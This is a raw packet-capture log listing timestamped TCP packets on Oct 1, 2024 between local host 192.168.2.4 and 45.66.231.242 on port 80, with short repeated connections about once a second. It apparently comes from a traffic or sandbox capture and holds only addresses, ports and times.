Oct 1, 2024 10:56:21.722162962 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.724112034 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.728981972 CEST	80	49804	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:21.729047060 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.733994961 CEST	80	49804	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.785677910 CEST	80	49804	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.785753965 CEST	80	49804	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.785810947 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.785964012 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.790596008 CEST	80	49804	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.920218945 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.925117016 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.925271988 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.927316904 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.932210922 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:22.932406902 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:22.937263012 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.757464886 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.757534027 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.757565022 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.757603884 CEST	49805	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.762391090 CEST	80	49805	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.902941942 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.907851934 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.907937050 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.909893990 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.914652109 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:23.914706945 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:23.919522047 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.643047094 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.643142939 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.643202066 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.643243074 CEST	49806	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.648158073 CEST	80	49806	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.778748989 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.783708096 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.783783913 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.785759926 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.790565968 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:27.790640116 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:27.795490026 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.561955929 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.562108040 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.562141895 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.562171936 CEST	49807	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.566910982 CEST	80	49807	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.705497980 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.710371017 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.710477114 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.712415934 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.717246056 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:28.717307091 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:28.722081900 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.396918058 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.396960974 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.397053003 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.397099972 CEST	49808	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.402143002 CEST	80	49808	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.535343885 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.540148973 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.540234089 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.543512106 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.548310995 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:29.548372030 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:29.553191900 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.238183975 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.238261938 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.238348961 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.238497972 CEST	49809	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.243287086 CEST	80	49809	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.391628027 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.396502972 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.396624088 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.398751020 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.403630972 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:30.403711081 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:30.408608913 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.057346106 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.057543039 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.057615995 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.096518040 CEST	49810	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.101296902 CEST	80	49810	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.345984936 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.350828886 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.350925922 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.355782986 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.360622883 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:31.360697985 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:31.365572929 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.074229002 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.074245930 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.074354887 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.074414015 CEST	49811	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.079313040 CEST	80	49811	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.231419086 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.236382008 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.236579895 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.239622116 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.244415045 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.244487047 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.249366045 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.917283058 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.917331934 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:32.917597055 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.917597055 CEST	49812	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:32.922481060 CEST	80	49812	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.065752983 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.070699930 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.070812941 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.073720932 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.078677893 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.078751087 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.083571911 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.794236898 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.794632912 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:33.794816971 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.839329958 CEST	49813	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:33.845001936 CEST	80	49813	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.251277924 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.256083965 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.256186008 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.259226084 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.263988018 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.264055014 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.268954992 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.954164982 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.954281092 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:34.954399109 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.954399109 CEST	49814	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:34.959453106 CEST	80	49814	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.106074095 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.110893965 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.111094952 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.113996029 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.118736029 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.118822098 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.123569965 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.846981049 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.847107887 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.848056078 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.848112106 CEST	49815	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.853991985 CEST	80	49815	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.994165897 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:35.999106884 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:35.999219894 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.002137899 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.006947041 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:36.007121086 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.011867046 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:36.897743940 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:36.897759914 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:36.897883892 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:36.897917032 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.897983074 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.898077965 CEST	49816	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:36.903028011 CEST	80	49816	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.063914061 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.068876028 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.069091082 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.072134018 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.076915979 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.076988935 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.081810951 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.826824903 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.826932907 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.827181101 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.827413082 CEST	49817	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.832349062 CEST	80	49817	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.980405092 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.985778093 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.985889912 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.988904953 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.993758917 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:37.993838072 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:37.999326944 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.657680035 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.657710075 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.657816887 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.657917976 CEST	49818	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.662708044 CEST	80	49818	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.804476976 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.809437990 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.809638977 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.812674999 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.817497969 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:38.817576885 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:38.822448969 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.503447056 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.503530025 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.503640890 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.503735065 CEST	49819	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.508519888 CEST	80	49819	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.657680035 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.664352894 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.664554119 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.669230938 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.675410032 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:39.675483942 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:39.681597948 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.380754948 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.380783081 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.380881071 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.380932093 CEST	49820	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.385790110 CEST	80	49820	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.529465914 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.534312963 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.534426928 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.538661957 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.543445110 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:40.543639898 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:40.548365116 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.310524940 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.310563087 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.310663939 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.310714006 CEST	49821	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.315505981 CEST	80	49821	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.457863092 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.462841034 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.462941885 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.464965105 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.469813108 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:41.469899893 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:41.474718094 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.196302891 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.196382046 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.196430922 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.196459055 CEST	49822	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.201278925 CEST	80	49822	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.343494892 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.348530054 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.348648071 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.350737095 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.355602980 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:42.355680943 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:42.360491037 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.188508034 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.188554049 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.188728094 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.188899994 CEST	49823	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.193662882 CEST	80	49823	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.330215931 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.335081100 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.335253000 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.341423035 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.346295118 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:43.346923113 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:43.351775885 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.087699890 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.087728977 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.087856054 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.087949991 CEST	49824	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.092775106 CEST	80	49824	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.238311052 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.243158102 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.243228912 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.245318890 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.250159979 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.250216961 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.254991055 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.963037014 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.963192940 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:44.963211060 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.963388920 CEST	49825	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:44.968018055 CEST	80	49825	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.112330914 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.117228031 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.117403984 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.119550943 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.124363899 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.124435902 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.129246950 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.843538046 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.843573093 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.843693972 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.843728065 CEST	49826	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.848546982 CEST	80	49826	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.989365101 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.994198084 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:45.994307995 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:45.996553898 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.001847029 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.001924992 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.006688118 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.767757893 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.767875910 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.767885923 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.767959118 CEST	49827	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.772732973 CEST	80	49827	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.920260906 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.925290108 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.925380945 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.927398920 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.932241917 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:46.932311058 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:46.937129974 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.567887068 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.568003893 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.568144083 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.568144083 CEST	49828	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.572926044 CEST	80	49828	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.703016043 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.708062887 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.708184004 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.710268974 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.715066910 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:47.715173006 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:47.719971895 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.474303007 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.474333048 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.474447966 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.474613905 CEST	49829	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.479547977 CEST	80	49829	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.639234066 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.644165993 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.644253016 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.651488066 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.656292915 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:48.656357050 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:48.661314011 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.332030058 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.332051039 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.332109928 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.332151890 CEST	49830	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.343833923 CEST	80	49830	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.480952024 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.486859083 CEST	80	49831	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.486955881 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.488979101 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.497201920 CEST	80	49831	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:49.497277021 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:49.502142906 CEST	80	49831	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.153675079 CEST	80	49831	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.153697968 CEST	80	49831	45.66.231.242	192.168.2.4
